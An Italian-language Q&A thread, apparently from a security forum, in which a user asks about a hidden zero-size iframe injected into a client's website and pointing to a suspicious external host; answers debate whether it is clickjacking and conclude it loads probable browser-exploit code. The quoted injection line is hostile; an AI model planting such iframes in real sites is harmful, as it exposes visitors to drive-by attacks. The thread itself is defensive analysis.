Qual è lo scopo di questo codice malware?

2

Questo è il codice che ho trovato sul sito web del mio cliente:

 ?><noindex><nofollow>
<iframe src="htxp://atluscomdnsup23.ikwb.cxm/main.php?page=1f1214ff37a3022d" height="0" width="0" FRAMEBORDER="0" style="visibility: hidden; position: absolute;"></iframe>
</iframe></nofollow></noindex>
    
posta noarm 08.05.2012 - 15:33
fonte

2 risposte

1

Penso che questo sia in qualche modo un attacco di clickjacking e puoi leggerlo qui Tutorial per il clickjacking anche questo è un bel video sugli attacchi di clickjacking Simatic Clickjacking definito

    
risposta data 08.05.2012 - 15:51
fonte
8

Questo sta inserendo un iframe nascosto che punta a un sito Web (presumibilmente compromesso) che conterrà più codice malvagio.

Non sono d'accordo con la risposta di Ali Hussein, non sembra esserci alcuna relazione con il clickjacking, poiché non sta cercando di apparire sopra altri elementi della pagina. Cerca semplicemente di non essere visto.

Probabilmente, atluscomdnsup23 conterrà javascript che tenta di sfruttare vulnerabilità nel tuo browser, seguendo referral, aprendo popup pubblicitari, ecc.

    
risposta data 04.09.2015 - 01:18
fonte

Leggi altre domande sui tag